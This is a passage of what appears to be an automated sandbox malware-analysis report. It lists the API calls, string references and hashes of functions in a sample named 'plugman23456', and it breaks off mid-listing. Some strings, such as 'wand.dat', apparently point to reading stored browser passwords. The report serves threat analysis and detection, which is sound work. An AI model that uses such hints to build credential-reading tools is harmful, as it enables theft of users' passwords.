                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                          Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                          • GetMenu.USER32(?), ref: 00410F8D
                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                          • String ID:
                          • API String ID: 1889144086-0
                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                          Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                          • GetLastError.KERNEL32 ref: 0041810A
                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastMappingView
                          • String ID:
                          • API String ID: 1661045500-0
                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                          • memcpy.MSVCRT ref: 0042EC7A
                          Strings
                          • sqlite_altertab_%s, xrefs: 0042EC4C
                          • Cannot add a column to a view, xrefs: 0042EBE8
                          • virtual tables may not be altered, xrefs: 0042EBD2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                          • API String ID: 1297977491-2063813899
                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040560C
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.*$dat$wand.dat
                          • API String ID: 2618321458-1828844352
                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                          • wcslen.MSVCRT ref: 00410C74
                          • _wtoi.MSVCRT ref: 00410C80
                          • _wcsicmp.MSVCRT ref: 00410CCE
                          • _wcsicmp.MSVCRT ref: 00410CDF
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                          • String ID:
                          • API String ID: 1549203181-0
                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00412057
                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                          • GetKeyState.USER32(00000010), ref: 0041210D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                          • String ID:
                          • API String ID: 3550944819-0
                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                          Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                          • memcpy.MSVCRT ref: 0040A94F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 3023356884-0
                          • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                          • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                          Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • wcslen.MSVCRT ref: 0040B1DE
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                          • memcpy.MSVCRT ref: 0040B248
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 3023356884-0
                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: @
                          • API String ID: 3510742995-2766056989
                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                          Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID:
                          • API String ID: 1865533344-0
                          • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                          • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                          Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                          Download Yara Rule
                          APIs
                          • strlen.MSVCRT ref: 0040B0D8
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                          • memcpy.MSVCRT ref: 0040B159
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 1171893557-0
                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004144E7
                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                          • memset.MSVCRT ref: 0041451A
                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                          • String ID:
                          • API String ID: 1127616056-0
                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                          Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: sqlite_master
                          • API String ID: 438689982-3163232059
                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                          Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                          • wcscpy.MSVCRT ref: 00414DF3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: BrowseFolderFromListMallocPathwcscpy
                          • String ID:
                          • API String ID: 3917621476-0
                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                          Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                          • _snwprintf.MSVCRT ref: 00410FE1
                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          • _snwprintf.MSVCRT ref: 0041100C
                          • wcscat.MSVCRT ref: 0041101F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                          • String ID:
                          • API String ID: 822687973-0
                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                          • malloc.MSVCRT ref: 00417459
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@malloc
                          • String ID:
                          • API String ID: 4284152360-0
                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                          • RegisterClassW.USER32(?), ref: 00412428
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleModule$ClassCreateRegisterWindow
                          • String ID:
                          • API String ID: 2678498856-0
                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00409B40
                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$Item
                          • String ID:
                          • API String ID: 3888421826-0
                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00417B7B
                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                          • GetLastError.KERNEL32 ref: 00417BB5
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockUnlockmemset
                          • String ID:
                          • API String ID: 3727323765-0
                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                          Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                          • malloc.MSVCRT ref: 00417407
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@malloc
                          • String ID:
                          • API String ID: 4284152360-0
                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040F673
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                          • strlen.MSVCRT ref: 0040F6A2
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040F6E2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                          • strlen.MSVCRT ref: 0040F70D
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                          Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00402FD7
